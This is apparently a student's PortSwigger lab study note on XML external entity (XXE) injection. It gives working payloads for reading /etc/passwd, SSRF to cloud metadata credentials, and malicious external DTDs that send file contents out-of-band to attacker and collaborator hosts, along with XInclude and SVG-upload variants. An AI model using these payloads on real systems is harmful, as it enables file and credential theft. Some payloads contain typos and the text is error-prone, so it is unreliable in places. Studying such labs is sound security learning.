###### `portsigger` `XXE` `injection` `web security`
# XML Basic Concept
XML is Extensible markup language.
XML is used to store and transport the data between the client and server.
XML tag dose not use predefined tags
## XML entities
Entities in XML is a way of resenting "items" in XML document
Declaration -> `<!ENTITY 'ent' 'value'>`
Reference entity in XML document
`&enitityName;` It like HTML Encoding
XML language defined various entities. e.g.
- `<` <
- `>` >
- `&` &
## Document type definition. (DTD)
DTD allows us to defined the customer entity! (we can control !)
DTD defines
- Entity name
- Entity value
DTD can be either internal or external, with external DTDs loaded from a different location than the document itself.
Allowing attacker injected the DTD via request and be pares on server.
DTD also allow the entity's value can be loaded from outside, instead of the document itself
## XML Customer Entities
XML allows the definition of custom entities within the DTD. For example:
DTD
```xml
<!DOCTYPE foo [
<!ENTITY meowentity "entity values">
]>
```
## XML External Entities (Exploitable)
Customer XML entity defined in the DTD whose value can be loaded from an external source are know as "external entities"
To defined customer external entity, we have to add `SYSTEM` keyword and specify the url which entity value should be load!.
```
<!DOCTYPE
foo[
<!ENTITY externalEntity SYSTEM "http://normal-website/API">
]
>
```
It's also possible to use file protocol to load a file as external entities.
```
<!DOCTYPE
foo [
<!ENTTY externalEntitiy SYSTEM "file:///etc/passwd">
]
>
```
# XXE (External Entity Injection)
XML is common used to send the data from the client to the backend.
XXE allow attacker to interfere with applications processing of data.
## XXE Arise
Stand XML parser contains various danger functions.
When application allow us inject the external entity. we can attempt to induce the application launch HTTP request or retrieve the file using file protocol.
## Type Of XEE attack type
- Exploiting XEE to retrieve files
- Exploiting XEE to perform SSRF attack
- Exploiting XEE exfiltrate data out-of-band
- Exploiting XEE to retrieve the data via error message.
# Exploit-XEE
## Retrieve arbitrary files via file protocol
When we want the using XEE to retrieve files, there are two step we have to do
- Defined the customer external entity from DTD
- Edit the data value in XML that is return in the application's respond. modify it to our defined customer external entity.
Example:
```
<?xml version="1.0" encoding="UTF-8"?>
<stockCheck><productId>381</productId></stockCheck>
```
IF application didn't have WAF or filter, we can attempt to inject external entity to retrieve the data
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE meow[<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<stockCheck><productId>&xxe</productId></stockCheck>
```
we defined external entity via DTD, the application will pare the entity and return the value of entity
Result !
```
Invalid product ID: root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
```
### LAB-Exploit XEE using external entity to retrieve the sensitive data
#### Mapping the target & Recon
#### Discovering Attack Surface
Parameters
Functionalities
- check stock
#### Identify
We discover the functionality of checking stock through XML to transfer data
we can attempt induce the server send the request to our collaborate to identify vulnerability
```
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE meow [<!ENTITY XXE SYSTEM "http://ne5wo97glzo0f9am8rjmrj1oofu6i06p.oastify.com">]>
<stockCheck><productId>1</productId><storeId>&XXE;</storeId></stockCheck>
```
According collaborate receive the request form the application, there is a XEE vulnerability.
#### Exploit
Retrieve the sensitive data
`file:///etc/host`
```
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE meow [<!ENTITY XXE SYSTEM "file:///etc/passwd">]>
<stockCheck><productId>&XXE;</productId><storeId>&XXE;</storeId></stockCheck>
```
Solved !
## XXE perform SSRF Attack
Beside the retrieve the sensitive data form host.
External entity allow us induce the server trigger the http request arrive any backe-infrastructure where we want
Construct SSRF via XXE, we need to defined the customer external entity and find the another entity with data value that is returned in application response, otherwise we can only perform Bind SSRF attack
payload:
`<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://internal.vulnerable-website.com/"> ]>`
### LAB-Exploiting XXE perform SSRF
#### Mapping the target & Recon
#### Discover the attack surface
Parameters
Functionalities
- checking stock
#### Identify
Evaluated checking stock
Normal request
Reflected value in response
```
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://y987jk2rgajbak5x32exmuwzjqphdc11.oastify.com"> ]>
<stockCheck><productId>
&xxe;
</productId><storeId>1</storeId></stockCheck>
```
According the application's response, we can identify there is a the vulnerability of XXE.
#### Exploit
we can testing EC2 IP address
Adding any value of path in response until print `/latest/meta-data/iam/security-credentials/admin` and update entity value to fetch the credential!
```
/latest/meta-data/iam/security-credentials/admin
```
# Blind XXE
Blind XXE arise where the application is vulnerable XXE attack, but the custom entity value didn't appear in the response, This make it challenge to observer the impact of malicious request on the server.
## Identify bind-XXE via out-of-band techniques
```xml
`<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://ourC2server">
]>`
```
IF our c2 server receive the response from target request,it indicate XEE Attack was successful.
### LAB-Blind XXE with out-of-band interaction
#### Mapping the target & Recon
#### Discover the attack surface
parameters
Functionality
- `product stock`
It uses XML to transfer data to the Server
#### Identify
Evaluated the product stock functionality
Normal request
Using out-out-band testing to check for XXE vulnerability.
Base on the result, identify the existence of a bind XXE.
Solved!!!
---
### Bypass some Regular Filter
Some time, regular will be applied due to input validation or more secure XML parsing,
n such cases, we can use parameter entities.
XML parameter entities are a special kind of XML entity that can only be referenced elsewhere within the DTD.
XML parameter entity
```
<!ENTITY % ent "entValue">
```
Reference Entity
```
%entValue
```
Payload
```xml=
<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://f2g9j7hhkax.web-attacker.com"> %xxe; ]>
```
### LAB-Bind XXE with out-of-bound interaction with XML parameter entities.
#### Mapping the target & Recon
#### Discovering the attack surface
Parameters
Functionalities
- Product stock
#### Identify
Evaluate product stock functionality
Attempt Inject XML DTD and entity
Using DTD parameter entity bypass filter
```xml
<!DOCTYPE meow [<!ENTITY % XXE SYSTEM "http://e9o0enzj5podje8gk2r4qi4ouf06oxcm.oastify.com"> %XXE; ]>
```
Success !!
We can ensure there is a Bind XXE in here.
Solved !!!
---
## Exploiting Bind XXE to Exfiltrate data via Out-Of-Band
To exploit bind XXE to exfiltrate data out -of-band, we need to host malicious DTD file on our server, and invoking the external DTD with inbound XXE payload, like this
1, Host your malicious DTD file on your server, for instance
```xml=
<!-- malicious.dtd -->
<!ENTITY % senstiveFile SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &x25; exfiltrate SYSTEM 'http://c2server?x=%senstiveFile;'>">
%eval;
%exfiltrate;
```
- `%sensitiveFile` defines the sensitive file you want to exfiltrate.
- `%eval` dynamically declares the `exfiltrate` entity.
- `%exfiltrate` invokes the exfiltration.
2.Invokes the malicious DTD hosted on your server.
```
<!DOCTYPE meow[
<!ENTITY % xxe SYSTEM
"http://web-attacker.com/malicious.dtd">
%xxe; ]>
```
When XML parser fetches the external DTD, it interprets it inline and executes the malicious entity, resulting in data exfiltration.
Note: This technique might not support files containing many new line characters because some XML parsers validate the external URL for illegal characters such as `\r\n`. Instead, you can attempt using the FTP protocol or read other files, such as `/etc/hostname`.
### LAB-Exploit Bind XEE to exfilrate the data via Using malicious external DTD
#### Mapping the target & Recon
#### Discovering the attack surface
parameters
functionalities
- product stock checking
It use XML to transfer data between the client and server.
#### Identify
Evaluated XXE vulnerability in product checking
Payload!
```xml
<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://e9o0enzj5podje8gk2r4qi4ouf06oxcm.oastify.com"> %xxe; ]>
```
According collaborate's respond there is a Bind XXE in here.
#### Exploit
Exfiltrate Data
Parse external entity inline
```
<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://exploit-0a0600f9046692c681015d2c01820074.exploit-server.net/exploit.dtd"> %xxe; ]>
```
Malicious Entity
```xml
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://8jsuoh9dfjy7t8iauw1y0cei49a0ytmi.oastify.com/?x=%file;'>">
%eval;
%exfiltrate;
```
Solved!!!
---
## Exploiting blind XXE to retrieve data via error message
Trigger the error message is Another way to exploit blind XXE.
If server reflect error message in response , we may through it to retrieve data.
we can host malicious DTD on own suerver and induce the vulnerable website load the DTD and parse it inline.
```xml=
<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://c2Server.net/exploit.dtd"> %xxe; ]>
```
Malicious Entity:
```xml=
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
```
### LAB-Exploiting blind XEE to retrieve data via error message.
#### Mapping the target & Recon
#### Discovering the attack surfaces
Parameters
Functionalities
- Product stock checking
Product Stock using XML transfer and exchange data.
#### Identify
Evaluating XXE vulnerability.
```xml=
<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://e9o0enzj5podje8gk2r4qi4ouf06oxcm.oastify.com"> %xxe; ]>
```
Using XXE to trigger out-of-band and we receive the HTTP response.
There is a XXE vulnerability in stock checking.
#### Exploit
Retrieve the file contain via XXE
Malicious Entity
```xml=
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://8jsuoh9dfjy7t8iauw1y0cei49a0ytmi.oastify.com/?x=%file;'>">
%eval;
%exfiltrate;
```
Induce vulnerability to load our entities
```
<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://exploit-0a97007c03cef731807fc0fe01a0002f.exploit-server.net/exploit.dtd"> %xxe; ]>
```
We can use the file protocol to trigger an error message to exfiltrate `/etc/passwd`.
Malicious Entity via error message
```xml=
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'file:///meowError/;'>">
%eval;
%exfiltrate;
```
```xml=
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'file:///meowError/%file;'>">
%eval;
%exfiltrate;
```
Solved LAB
---
## Exploiting bind XXE repurposing a local DTD
(SKIPPPp) ----> EXploit
# Hidden attack surface for XXE injection
In many case, XEE attack surface is obvious, typically occur when application transfer or exchange date though XML form.
In some situation, the XXE vulnerability context in which not appear in XML document.
## XInclude attacks
Some application will receive data form the client and embeding it in XML document such as SOAP (simple object access protocol) API
Xinclude is part of specification that allow XML built from sub-document.
To perform the xInclude attack, we have to reference the Xinclude namespace and provide the file path we wish include
```
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>
```
### LAB-Exploit xInclude to retrieve file
### Mapping the target &PRecon
### Discovering the attack surface
Parameters
Functionalities
- Product Stock
Using scanner to Discover the hide Attack surface
### Identify
Identify XXE in Product Stock
xInclude testing
```
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="http://f1h2s6logj4ogylo4vif231hx83zrpfe.oastify.com"/></foo>
```
Based on the Out-of-band interaction, the application is vulnerable on XXE xInclude attack
### Exploit
Attempt to retrieve the /etc/passwd
```xml=
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>
```
Solved !!
## XEE via file upload
Some application allow the user to upload such jpg, png, and process them on server-side
Commend file base on XML such as DOCX or office document, SVG
For example, we the application receive the image form user, it will process it due to the SVG images using XML, we can submit malicious XML reach attack for XXE vulnerability.
### LAB Exploiting XXE via file upload
#### Mapping the target & Recon
#### Discovering the attack surface
Parameters
Functionalities
- Avatar Upload
Allowing -> SVG (XML)
- Post Comment
#### Identify
Evaluated Avatar upload
It allowing XML upload -> we can attempt
Scanner Audit
```
<!DOCTYPE meow [<!ENTITY % XXE SYSTEM "http://xtukkod681w68gd6wdaxultzpqvhj87x.oastify.com"> %XXE; ]>
```
Based on the Out-of-band interaction, the application is vulnerable on XXE xInclude attack
#### Exploit
Attempt to retrieve sensitive data and print on the SVG
```xml=
<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>
```
## XEE attack via modify attack type
Some application will tolerate other content-type when submit the from
e.g. Expect content-type
`application/x-www-form-urlencoded`
```
POST /action HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 7
meow=hecker
```
If the application support XML, the follow with the same result
```
POST /action HTTP/1.0
Content-Type: text/xml
Content-Length: 52
<?xml version="1.0" encoding="UTF-8"?><meow>hecker</meow>
```
IF application tolerates requests containing XML, we can attempt inject external entity to identity the vulnerability.
<!--
#### Mapping the target & Recon
#### Discovering the attack surface
parameters
Functionalities
#### Identify
#### Exploit -->
Sign in with Wallet
Connect another wallet